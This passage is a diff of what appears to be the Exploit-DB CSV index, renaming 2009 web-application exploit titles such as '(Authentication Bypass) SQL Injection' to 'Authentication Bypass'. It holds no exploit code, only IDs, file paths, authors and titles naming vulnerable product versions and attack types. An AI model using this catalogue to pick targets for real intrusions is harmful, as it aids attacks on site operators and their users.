 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0
 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0
-8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
+8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,php,webapps,0
 8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0
 8475,platforms/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0
 8476,platforms/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0
-8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Authentication Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0
+8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - Authentication Bypass",2009-04-17,HCOCA_MAN,php,webapps,0
 8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0
 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0
 8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0
 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
-8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0
+8487,platforms/php/webapps/8487.txt,"EZ Webitor - Authentication Bypass",2009-04-20,snakespc,php,webapps,0
 8488,platforms/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0
 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
@@ -20905,7 +20908,7 @@ id,file,description,date,author,platform,type,port
 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0
 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0
 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
-8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - (Authentication Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0
+8497,platforms/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",php,webapps,0
 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0
 8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0
 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0
@@ -20914,12 +20917,12 @@ id,file,description,date,author,platform,type,port
 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0
 8505,platforms/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0
 8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0
-8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection",2009-04-21,Hakxer,php,webapps,0
+8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - Authentication Bypass",2009-04-21,Hakxer,php,webapps,0
 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0
 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps,0
 8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps,0
 8514,platforms/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0
-8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Authentication Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0
+8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - Authentication Bypass",2009-04-22,zer0day,php,webapps,0
 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion",2009-04-22,ahmadbady,php,webapps,0
 8517,platforms/php/webapps/8517.txt,"Joomla! Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,php,webapps,0
 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload",2009-04-23,YEnH4ckEr,php,webapps,0
@@ -20947,7 +20950,7 @@ id,file,description,date,author,platform,type,port
 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0
 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0
 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0
-8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Authentication Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0
+8571,platforms/php/webapps/8571.txt,"Tiger Dms - Authentication Bypass",2009-04-29,"ThE g0bL!N",php,webapps,0
 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0
 8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,php,webapps,0
 8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0
@@ -20975,9 +20978,9 @@ id,file,description,date,author,platform,type,port
 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0
 8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0
 8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0
-8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0
-8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Authentication Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0
-8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Authentication Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0
+8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup",2009-05-08,TiGeR-Dz,php,webapps,0
+8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - Authentication Bypass",2009-05-08,"ThE g0bL!N",php,webapps,0
+8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - Authentication Bypass",2009-05-08,knxone,php,webapps,0
 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
 8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
@@ -20994,12 +20997,12 @@ id,file,description,date,author,platform,type,port
 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
 8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0
 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0
-8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0
+8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0
 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps,0
 8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - (arch.php arch) Local File Inclusion",2009-05-14,Kacper,php,webapps,0
 8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],php,webapps,0
 8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
-8683,platforms/php/webapps/8683.txt,"Submitter Script - (Authentication Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0
+8683,platforms/php/webapps/8683.txt,"Submitter Script - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0
 8684,platforms/php/webapps/8684.txt,"MRCGIGUY Hot Links SQL 3.2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
 8685,platforms/php/webapps/8685.txt,"MRCGIGUY Amazon Directory 1.0/2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
 8686,platforms/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0
@@ -21019,7 +21022,7 @@ id,file,description,date,author,platform,type,port
 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0
 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0
 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0
-8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Authentication Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0
+8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - Authentication Bypass",2009-05-18,snakespc,php,webapps,0
 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0
 8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0
 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps,0
@@ -21041,7 +21044,7 @@ id,file,description,date,author,platform,type,port
 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps,0
 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0
 8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,php,webapps,0
-8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0
+8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - Authentication Bypass",2009-05-19,snakespc,php,webapps,0
 8743,platforms/php/webapps/8743.txt,"Joomla! Component Casino 0.3.1 - Multiple SQL Injections Exploits",2009-05-20,ByALBAYX,php,webapps,0
 8744,platforms/php/webapps/8744.txt,"Exjune Officer Message System 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
 8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,php,webapps,0
@@ -21052,10 +21055,10 @@ id,file,description,date,author,platform,type,port
 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0
 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0
 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0
-8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0
+8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - Authentication Bypass",2009-05-21,Striker7,php,webapps,0
 8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,asp,webapps,0
 8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps,0
-8761,platforms/php/webapps/8761.txt,"Article Directory - (Authentication Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0
+8761,platforms/php/webapps/8761.txt,"Article Directory - Authentication Bypass",2009-05-21,Hakxer,php,webapps,0
 8762,platforms/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0
 8763,platforms/php/webapps/8763.txt,"ZaoCMS - Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0
 8764,platforms/php/webapps/8764.txt,"ZaoCMS - 'download.php' Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0
@@ -21085,7 +21088,7 @@ id,file,description,date,author,platform,type,port
 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",php,webapps,0
 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0
 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0
-8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0
+8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps,0
 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0
 8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0
 8811,platforms/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps,0
@@ -21100,7 +21103,7 @@ id,file,description,date,author,platform,type,port
 8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection",2009-05-29,intern0t,php,webapps,0
 8821,platforms/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0
 8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0
-8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
+8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - Authentication Bypass",2009-05-29,TiGeR-Dz,php,webapps,0
 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps,0
 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
@@ -21129,7 +21132,7 @@ id,file,description,date,author,platform,type,port
 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0
 8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0
 8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
-8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0
+8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - Authentication Bypass",2009-06-03,Qabandi,php,webapps,0
 8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0
 8867,platforms/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0
@@ -21143,10 +21146,10 @@ id,file,description,date,author,platform,type,port
 8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0
 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0
 8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) SQL Injection",2009-06-05,snakespc,php,webapps,0
-8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Authentication Bypass) SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0
+8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",php,webapps,0
 8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0
 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0
-8886,platforms/php/webapps/8886.txt,"MyCars Automotive - (Authentication Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0
+8886,platforms/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps,0
 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
 8890,platforms/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0
 8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0
@@ -21183,7 +21186,7 @@ id,file,description,date,author,platform,type,port
 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0
 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps,0
 8933,platforms/php/webapps/8933.php,"Sniggabo CMS - 'article.php id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0
-8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0
+8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - Authentication Bypass",2009-06-12,ByALBAYX,php,webapps,0
 8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0
 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,php,webapps,0
 8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,php,webapps,0
@@ -21242,12 +21245,12 @@ id,file,description,date,author,platform,type,port
 9016,platforms/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0
 9017,platforms/php/webapps/9017.txt,"Joomla! Component com_pinboard - (task) SQL Injection",2009-06-25,Stack,php,webapps,0
 9018,platforms/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps,0
-9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
+9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - Authentication Bypass",2009-06-25,YEnH4ckEr,php,webapps,0
 9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - (resetpwemail) Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
 9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0
 9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps,0
 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps,0
-9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Authentication Bypass) SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0
+9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",php,webapps,0
 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0
 9026,platforms/php/webapps/9026.txt,"WHOISCART - (Authentication Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0
 9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0
@@ -21283,7 +21286,7 @@ id,file,description,date,author,platform,type,port
 9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0
 9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,php,webapps,0
 9077,platforms/php/webapps/9077.txt,"ConPresso 3.4.8 - 'detail.php' Blind SQL Injection",2009-07-02,tmh,php,webapps,0
-9079,platforms/php/webapps/9079.txt,"Opial 1.0 - (Authentication Bypass) SQL Injection",2009-07-02,Moudi,php,webapps,0
+9079,platforms/php/webapps/9079.txt,"Opial 1.0 - Authentication Bypass",2009-07-02,Moudi,php,webapps,0
 9080,platforms/php/webapps/9080.txt,"Opial 1.0 - 'albumID' SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0
 9081,platforms/php/webapps/9081.txt,"Rentventory - Multiple SQL Injections",2009-07-02,Moudi,php,webapps,0
 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
@@ -21329,7 +21332,7 @@ id,file,description,date,author,platform,type,port
 9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0
 9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,php,webapps,0
 9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0
-9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Authentication Bypass) SQL Injection",2009-07-16,ka0x,php,webapps,0
+9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,php,webapps,0
 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0
 9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0
 9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0
@@ -21352,7 +21355,7 @@ id,file,description,date,author,platform,type,port
 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0
 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0
 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0
-9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection",2009-07-21,n3w7u,php,webapps,0
+9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - Authentication Bypass",2009-07-21,n3w7u,php,webapps,0
 9226,platforms/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection",2009-07-21,Moudi,php,webapps,0
 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0
 9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0
@@ -21364,7 +21367,7 @@ id,file,description,date,author,platform,type,port
 9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0
 9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
-9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
+9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0
 9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0
 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0
@@ -21390,9 +21393,9 @@ id,file,description,date,author,platform,type,port
 9276,platforms/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,php,webapps,0
 9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps,0
 9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,php,webapps,0
-9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Authentication Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0
